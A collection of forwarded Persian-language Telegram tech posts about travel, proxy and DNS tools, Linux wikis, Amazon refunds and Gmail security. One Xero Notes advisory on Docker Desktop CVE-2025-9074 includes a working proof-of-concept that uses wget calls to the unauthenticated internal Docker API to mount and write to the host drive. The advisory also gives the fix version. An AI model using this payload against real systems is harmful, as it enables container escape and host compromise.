Forwarded from جادی | Jadi
خب خب.. در تلاش برای بیشتر به اشتراک گذاشتن از زندگی شخصی، من در حال سفرم. الان مارسی فرانسه. شهری ۲۶۰۰ ساله!
شهر سالها پیش مشهور بوده به ناامنی ولی ده بیست است که با برنامه درست دولتی دارن مشکل رو حل میکنن. البته با بگیر و ببند نه.. با اضافه کردن روشنایی، جمع آوری زباله، زیاد کردن ارتباط با جاهای دیگه، کم کردن از عرض خیابان و اضافه کردن به پیاده رو در جاهای توریستی، حذف پارکینگ و کاشان درخت و .. و بسیار هم موفق بودن و عملا در ۱۲ سال چهره شهر رو کلی تغییر دادن.
#سفر #فرانسه
شهر سالها پیش مشهور بوده به ناامنی ولی ده بیست است که با برنامه درست دولتی دارن مشکل رو حل میکنن. البته با بگیر و ببند نه.. با اضافه کردن روشنایی، جمع آوری زباله، زیاد کردن ارتباط با جاهای دیگه، کم کردن از عرض خیابان و اضافه کردن به پیاده رو در جاهای توریستی، حذف پارکینگ و کاشان درخت و .. و بسیار هم موفق بودن و عملا در ۱۲ سال چهره شهر رو کلی تغییر دادن.
#سفر #فرانسه
🔥1
Forwarded from IRCF | اینترنت آزاد برای همه
یک لانچر ساده برای Usque به نام Masque-Plus نوشتم، که ثبتنام، پیکربندی و اجرای پروکسی SOCKS رو برای استفاده از پروتکل #مسک مدیریت میکنه.
سعی کردم از فلگهای مشابه وارپپلاس برای این ابزار استفاده کنم و امکان پاسدادن اندپوینت هم فراهم بشه. در تلاشم در آپدیتهای بعدی یه اسکنر داخلی ساده هم برای اندپوینتهای مسک اضافه کنم.
👉 github.com/ircfspace/masque-plus
سعی کردم از فلگهای مشابه وارپپلاس برای این ابزار استفاده کنم و امکان پاسدادن اندپوینت هم فراهم بشه. در تلاشم در آپدیتهای بعدی یه اسکنر داخلی ساده هم برای اندپوینتهای مسک اضافه کنم.
👉 github.com/ircfspace/masque-plus
دانش من برای توسعه برنامه در سطح مبتدی بوده، پس اگر میتونین در توسعه و کمک برای دسترسی مردم به اینترنت آزاد قدم بردارید، کافیه PR بزنین.
در اینروش مثل وارپ، آیپی ایران دریافت میکنین، ولی با آیپی اصلی شما تفاوت داره و البته نمیتونین باهاش از سد تحریمها عبور کنین.
برنامه رو تست کنین و اگر مشکلی داشت از طریق ایشوهای گیتهاب گزارش بدین.
🔍 ircf.space
@ircfspace
Forwarded from IRCF | اینترنت آزاد برای همه
ابزار DNS Tester یه ابزار آنلاینه که برای تست و مقایسه سرعت سرورهای دیاناس ساخته شده و هدفش اینه که به کاربرا کمک کنه تا بر اساس موقعیت جغرافیایی و وضعیت اینترنتشون، سریعترین و مناسبترین سرور DNS رو پیدا و انتخاب کنن.
👉 darknessshade.github.io/DNS-Tester
💡 github.com/DarknessShade/DNS-Tester
🔍 ircf.space
@ircfspace
👉 darknessshade.github.io/DNS-Tester
💡 github.com/DarknessShade/DNS-Tester
🔍 ircf.space
@ircfspace
Forwarded from کانال اطلاعرسانی توزیع پارچ
پارچتان را نشکنید.
صفحهای در ویکی پارچ به منظور آموزش برای استفاده صحیح از پارچ.
https://wiki.parchlinux.com/fa/DontBreakYourParch
@ParchLinux
صفحهای در ویکی پارچ به منظور آموزش برای استفاده صحیح از پارچ.
https://wiki.parchlinux.com/fa/DontBreakYourParch
@ParchLinux
Forwarded from کانال مهرداد لینوکس
✅ هوش مصنوعی رایگان برای حذف بک گراند
https://nanobananas.site/tools/background-removal
#هوش_مصنوعی #AI
https://nanobananas.site/tools/background-removal
#هوش_مصنوعی #AI
nanobananas.site
AI Background Removal Tool - Free Online Background Remover
Remove backgrounds from images instantly using advanced AI technology. Free online tool with high-quality results, supports JPG, PNG, WEBP formats.
Forwarded from Xero Notes
🐋 آسیبپذیری CVE-2025-9074 در Docker Desktop
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
یک کانتینر جدید با دستور
📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
ttp://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم میتواند یک کانتینر جدید با دسترسیهای ویژه راهاندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم میکند.💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - https://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - https://192.168.65.7:2375/containers/$cid/start
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create
یک کانتینر جدید با دستور
echo pwned > /mnt/host_root/pwn.txt میسازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ میکند.📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
Forwarded from BenDev
YouTube
The Story of Python and how it took over the world | Python: The Documentary
This is the story of the world's most beloved programming language: Python. What began as a side project in Amsterdam during the 1990s became the software powering artificial intelligence, data science and some of the world’s biggest companies. But Python's…
Forwarded from !True
به نظرم این کار اشتباه ترین کار ممکنه.
ادمین وقتی به یک محبثی مسلط هست باید توی اون زمینه بیشتر پست و مباحث بزاره که هم خودش پیشرفت کنه و هم کاربرانی که توی اون حوزه هستن رو جذب کنه
اینکه ادمین دوتا پست از لاراول دوتا پست از جنگو دوتاپست از جاوااسکریپت بزاره هم کیفیت پست ها پایین میاد و هم دیپ شدن روی یک موضوع نیست و چندین تا موضوع میاد وسط و کلا کانال شلوغ میشه
ادمین وقتی به یک محبثی مسلط هست باید توی اون زمینه بیشتر پست و مباحث بزاره که هم خودش پیشرفت کنه و هم کاربرانی که توی اون حوزه هستن رو جذب کنه
اینکه ادمین دوتا پست از لاراول دوتا پست از جنگو دوتاپست از جاوااسکریپت بزاره هم کیفیت پست ها پایین میاد و هم دیپ شدن روی یک موضوع نیست و چندین تا موضوع میاد وسط و کلا کانال شلوغ میشه
Forwarded from یک برنامه نویس تنبل (Lazy 🌱)
🔶 هر چه بیشتر میفهمم موفقیت و محبوبیت چگونه عمل میکند، بیشتر به این نتیجه میرسم که احتمالاً هر سال میلیون ها انیشتین در فقر از دنیا میروند.
@TheRaymondDev
@TheRaymondDev
Forwarded from tiivik️
⭕️هر چیزی که طی ۲۰ سال در ردیت نوشتهاید، حالا در یک آرشیو جمع شده است.
سرویس Academic Torrents یک آرشیو عظیم از ردیت، شامل همه چیز از سال ۲۰۰۵ تا ۲۰۲۵، در دسترس قرار گرفته است.
در این مجموعه، تمام پستها و نظرات کاربران در این بازه زمانی گردآوری شدهاند، حجم کل دادهها حدود ۳.۴ ترابایت است، فایلها بر اساس ماه دستهبندی شده و برای راحتی بارگیری فشرده شدهاند.
🆔@tiivik
سرویس Academic Torrents یک آرشیو عظیم از ردیت، شامل همه چیز از سال ۲۰۰۵ تا ۲۰۲۵، در دسترس قرار گرفته است.
در این مجموعه، تمام پستها و نظرات کاربران در این بازه زمانی گردآوری شدهاند، حجم کل دادهها حدود ۳.۴ ترابایت است، فایلها بر اساس ماه دستهبندی شده و برای راحتی بارگیری فشرده شدهاند.
🆔@tiivik
Forwarded from Gopher Academy
🔵 عنوان مقاله
Building Ebitengine Games for Web Browsers
🟢 خلاصه مقاله:
این معرفی سهدقیقهای از تروِر اسلوکِم نشان میدهد چگونه بازیهای Ebitengine (موتور دوبعدی مبتنی بر Go) را برای مرورگر بسازیم. هسته کار این است: پروژه Go را با GOOS=js و GOARCH=wasm به WebAssembly کامپایل کنید، فایل wasm_exec.js را در صفحه HTML بگنجانید و بازی را روی یک canvas اجرا نمایید. در مرورگر باید به محدودیتهای فایلسیستم، بارگذاری ناهمزمان داراییها، نیاز شروع صدا با تعامل کاربر، همگامسازی رندر با requestAnimationFrame و تفاوتهای DPI و تغییر اندازه صفحه توجه کنید. برای داراییها از embed یا سرویسدهی مستقیم استفاده کرده و آنها را برای وب بهینه کنید؛ کنترلها را برای ماوس/کیبورد/تاچ طراحی و روی موبایل و مرورگرهای مختلف تست کنید. برای انتشار، یک میزبان استاتیک (مثل GitHub Pages/Netlify) کافی است، به شرط تنظیم MIME نوع application/wasm و HTTPS. نتیجه: مسیری سریع از ساخت دسکتاپ به وب با WebAssembly، یک HTML ساده و رعایت قیود مرورگر، مطابق راهنمای کوتاه و کاربردی نویسنده.
🟣لینک مقاله:
https://golangweekly.com/link/173337/web
➖➖➖➖➖➖➖➖
👑 @gopher_academy
Building Ebitengine Games for Web Browsers
🟢 خلاصه مقاله:
این معرفی سهدقیقهای از تروِر اسلوکِم نشان میدهد چگونه بازیهای Ebitengine (موتور دوبعدی مبتنی بر Go) را برای مرورگر بسازیم. هسته کار این است: پروژه Go را با GOOS=js و GOARCH=wasm به WebAssembly کامپایل کنید، فایل wasm_exec.js را در صفحه HTML بگنجانید و بازی را روی یک canvas اجرا نمایید. در مرورگر باید به محدودیتهای فایلسیستم، بارگذاری ناهمزمان داراییها، نیاز شروع صدا با تعامل کاربر، همگامسازی رندر با requestAnimationFrame و تفاوتهای DPI و تغییر اندازه صفحه توجه کنید. برای داراییها از embed یا سرویسدهی مستقیم استفاده کرده و آنها را برای وب بهینه کنید؛ کنترلها را برای ماوس/کیبورد/تاچ طراحی و روی موبایل و مرورگرهای مختلف تست کنید. برای انتشار، یک میزبان استاتیک (مثل GitHub Pages/Netlify) کافی است، به شرط تنظیم MIME نوع application/wasm و HTTPS. نتیجه: مسیری سریع از ساخت دسکتاپ به وب با WebAssembly، یک HTML ساده و رعایت قیود مرورگر، مطابق راهنمای کوتاه و کاربردی نویسنده.
🟣لینک مقاله:
https://golangweekly.com/link/173337/web
➖➖➖➖➖➖➖➖
👑 @gopher_academy
YouTube
Building Ebitengine Games for Web Browsers
This video explains how to build Ebitengine applications (and other Go applications) for web browsers.
https://trevors-tutorials.com/0009-building-ebitengine-games-for-web-browsers/
https://ebitengine.org
0:00 Intro and Table of Contents
0:28 WebAssembly…
https://trevors-tutorials.com/0009-building-ebitengine-games-for-web-browsers/
https://ebitengine.org
0:00 Intro and Table of Contents
0:28 WebAssembly…
Forwarded from Agora (Alireza)
آمازون واقعا عجیبه.
کتاب A philosophy of software design رو که بالاتر هم ازش تعریف کردم رو ازش سفارش دادم، امروز رسید. قیمتش ۲۲ یورو بود. ۲۲ یورو برای ۱۸۰ صفحه کتاب جلد کاغذی.
امروز که رسید یادم افتاد که یک کار دیگه هم میشه کرد. یه چرتکه انداختم دیدم اگر از اسکایبوک تو ایران سفارش بدم، با باری کیلویی ۱۰ یورو هم بخوان واسم بیارن، ارزون تر در میاد. گفتم اوکی پس میدم از اون ور سفارش میدم نهایتاً یک ماه دیگه میرسه. عجلهای هم نیست.
درخواست ریفاندو دادم، تو گزینهها گزینهی «با قیمت مناسبتر یه جا دیگه پیدا کردم» رو زدم، دیدم میگه کتاب بمونه پیش خودت پولشو میزنیم به اکانت آمازونت.
این سیستم مشتریمداری آمازون واقعا به قول اون بندهی خدا the bestه. بارها پیش اومده بود که این کار رو برای جنسهای زیر ۵ یورو انجام بده. یا حتی وقتی که با این که بسته نرسیده بود دستم ولی استتوش خورده بود delivered پولو ریفاند کردن. عدد حدود ۱۲۰ یورو.
یک نکته راجعبه این ریفاند پول کتاب هم واسم جالب بود. این که آمازون ترجیح میده تو توی سیستمش بمونی (با ریفاند پول به حساب خودت توی آمازون) ولی نری از اون فروشگاه محلی کتاب رو بخری. پول خیلی زیاد میتونه رقبا رو ببلعه. یک ریفاند، یک سفارش کمتر از اسکایبوک.
کتاب A philosophy of software design رو که بالاتر هم ازش تعریف کردم رو ازش سفارش دادم، امروز رسید. قیمتش ۲۲ یورو بود. ۲۲ یورو برای ۱۸۰ صفحه کتاب جلد کاغذی.
امروز که رسید یادم افتاد که یک کار دیگه هم میشه کرد. یه چرتکه انداختم دیدم اگر از اسکایبوک تو ایران سفارش بدم، با باری کیلویی ۱۰ یورو هم بخوان واسم بیارن، ارزون تر در میاد. گفتم اوکی پس میدم از اون ور سفارش میدم نهایتاً یک ماه دیگه میرسه. عجلهای هم نیست.
درخواست ریفاندو دادم، تو گزینهها گزینهی «با قیمت مناسبتر یه جا دیگه پیدا کردم» رو زدم، دیدم میگه کتاب بمونه پیش خودت پولشو میزنیم به اکانت آمازونت.
این سیستم مشتریمداری آمازون واقعا به قول اون بندهی خدا the bestه. بارها پیش اومده بود که این کار رو برای جنسهای زیر ۵ یورو انجام بده. یا حتی وقتی که با این که بسته نرسیده بود دستم ولی استتوش خورده بود delivered پولو ریفاند کردن. عدد حدود ۱۲۰ یورو.
یک نکته راجعبه این ریفاند پول کتاب هم واسم جالب بود. این که آمازون ترجیح میده تو توی سیستمش بمونی (با ریفاند پول به حساب خودت توی آمازون) ولی نری از اون فروشگاه محلی کتاب رو بخری. پول خیلی زیاد میتونه رقبا رو ببلعه. یک ریفاند، یک سفارش کمتر از اسکایبوک.
Amazon
A Philosophy of Software Design, 2nd Edition
This book addresses the topic of software design: how to decompose complex software systems into modules (such as classes and methods) that can be implemented relatively independently. The book first introduces the fundamental problem in software design,…
Forwarded from Linuxor ?
زبان نشانه گذاری YAML یکی از پرکاربرد ترین زبان هاست که توی کانفیگ ها و تعریف زیرساخت و CI/CD استفاده میشه به نظرتون چقدر YAML بلدید ؟ اینجا تستش کنید:
www.ohyaml.wtf
@Linuxor
www.ohyaml.wtf
@Linuxor
Forwarded from Geek Alerts
گوگل به ۲.۵ میلیارد کاربر Gmail اطلاع داده که رمز عبورشون رو برای امنیت بیشتر آپدیت کنن، توی شبکههای اجتماعی این با تیتر هک شدن جیمیل منتشر شده که درست نیست، ماجرا اینه چند وقت اخیر رمز کاربران Gmail زیاد لو میره، یه دلیلش اینه که جیمیل هدف خوبی برای هکرهاست چون معمولا آدمها همهچیز زندگیشون رو بهش وصل میکنن.
به خاطر همین ممکنه به کمک روشهایی مثل فیشینگ یا رمزهای ضعیف و لیک شده رمز اون لو بره. گوگل در واقع هشدار داده و گفته بهتره رمز رو عوض و ورود دو مرحلهای (2FA) رو فعال کنید. [L]
🤓 @geekalerts
به خاطر همین ممکنه به کمک روشهایی مثل فیشینگ یا رمزهای ضعیف و لیک شده رمز اون لو بره. گوگل در واقع هشدار داده و گفته بهتره رمز رو عوض و ورود دو مرحلهای (2FA) رو فعال کنید. [L]
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from ویتگنشتاین با چتر
یکی از بهترین مقالههایی که چند وقت پیش خوندم و کمک بزرگی به معماری کدهام کرد. بنظرم مواردی که بهش اشاره میشه قابل اعتناست. مخصوصا که چند ماه گذشته رو به واسطه دو جابهجایی که داشتم، بیشتر مشغول کد خوندن بودم تا کد نوشتن.
https://github.com/zakirullin/cognitive-load
https://github.com/zakirullin/cognitive-load
GitHub
GitHub - zakirullin/cognitive-load: 🧠 Cognitive load is what matters
🧠 Cognitive load is what matters. Contribute to zakirullin/cognitive-load development by creating an account on GitHub.
Forwarded from محتوای آزاد سهراب (Sohrab)
توی فکر این هستم که یک فراخوان بذارم برای تکمیل ویکی پارچ، برای هر قسمت مهم یک ویدئو ضبط بشه حالا افراد میخوان توی کانال شخصیشون بذارن یا کانال پارچ تفاوتی نمیکنه، مهمترین مسأله ایران اکسس بودن اون پلتفرم هاست که حالا یا میشه پیرتوب یا میشه آپارات و این ویدئوها رو اوایل صفحات ویکی بذاریم چون خوندن متن طولانی عملاً برای بعضی کاربرها سخته.
نظرات؟
@SohrabContents
نظرات؟
@SohrabContents
Forwarded from محتوای آزاد سهراب (Sohrab)
تا الان دوتا صفحه رو داریم، یکی صفحه نصب پارچ هستش که ویدئو آخر مطالبه و یکی هم مدیریت بسته که ویدئو رو گذاشتم اون اولش.
https://wiki.parchlinux.com/fa/Package-management
https://wiki.parchlinux.com/fa/installation
اول یا آخر مطالب به نظرتون کدوم بهتره؟
@SohrabContents
https://wiki.parchlinux.com/fa/Package-management
https://wiki.parchlinux.com/fa/installation
اول یا آخر مطالب به نظرتون کدوم بهتره؟
@SohrabContents